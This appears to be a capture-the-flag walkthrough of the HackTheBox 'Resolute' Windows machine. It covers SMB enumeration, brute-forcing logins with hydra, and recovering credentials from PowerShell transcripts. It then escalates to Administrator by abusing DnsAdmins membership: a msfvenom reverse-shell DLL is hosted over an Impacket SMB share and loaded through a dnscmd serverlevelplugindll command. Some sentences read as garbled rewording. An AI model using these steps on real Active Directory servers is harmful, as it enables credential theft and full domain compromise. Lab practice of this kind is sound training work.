Abusing DNS Admin Membership by DLL Injection in “dns.exe” for PrivEsc in Active Directory

5 minute read

  5 minute read

HTB - Resolute

Resolute was a medium level Windows computer that included a list of users and login discoveries for the SMB system. This password has been pulsed into the SMB login via hydra to the usernames identified. The listing of the privilege escalation led us to another member of the DnsAdmins group. Then, by violating his admin’s right to charge the DLL injection to obtain the Admin shell.


  • Running nmap scan give us the following information as below.

  • As windows machine, the interesting part of course the SMB services, let’s digging in via enum4linux.
  • Don’t forget to list all the potential accounts in the recon part. It’s helping us to move further you know…
  • Here, we have hint on marko account. See the description there. Password set to Welcome123!

  • Trying to log into marko account doesn’t work. The credential may be wrong.

  • We have the list of usernames right? Let’s try brute-force the smb login with hydra.
  • Yayy, we have the right credential for melanie account.


  • Nmap scan showed that port 5985 is open. It’s the default port for WinRM so catch the user flag by logging in via evil-winrm to melanie account.

  • After enumerating the host, we don’t meet any hint. Maybe by viewing hidden files give us hint? Let’s dir-Force and enum for hidden file of PSTranscripts.

  • In the PSTranscripts folder, we have a text file with Resolute name on it. Open the text file, give us hint of Powershell script with a potential credential of ryan account.

  • Then, moving into ryan account and see what we can do there.

Privilege escalation

First method:

  • On ryan desktop, there is a note.txt as below. What does that mean??

  • Enum for the groups information reveal us that ryan has DnsAdmins privilege.
  • If the account has DNSAdmins in it’s group memberships, then the user belongs to the group and we can abuse his membership to escalate to Administrator rights.

  • Based on this article, we are launching an arbitrary DLL of SYSTEM authority on a DNS server. i.e., we must create a DLL that contains the reverse tcp code and implant it into the dns.exe process on the victim’s DNS server (DC).
  • Building our DLL shell_reverse_tcp payload with msfvenom and output to privesc.dll.

Impacket’s smb server to the rescue:

  • Hosting our payload with smbserver.py.
  • We chose this as, in most cases, Windows allows UNC paths and samba shares by default. Also, there are times when the victim’s AV or Defender can delete the payload if it’s uploaded, so we’ll stick to the smb server for this one. Nonetheless, working with smb can be difficult on * nix, but thankfully, we have scripts that can make the task a lot simpler. We must use the Impacket smb server to host our payload.

sudo python smbserver.py <shareName> <path/of/share> eg sudo smbserver.py share ./

Injecting the DLL in dnscmd.exe into PS:

  • dnscmd.exe < FQDN of DC> /config /serverlevelplugindll \\UNC_path

Listening for connection and restarting dns if necessary:

  • Stop and restart the DNS service as below…

  • Listen for the connection and … we have Administrator privilege.

Second method:

  • Using windows/smb/psexec_psh module straight into Admin shell.
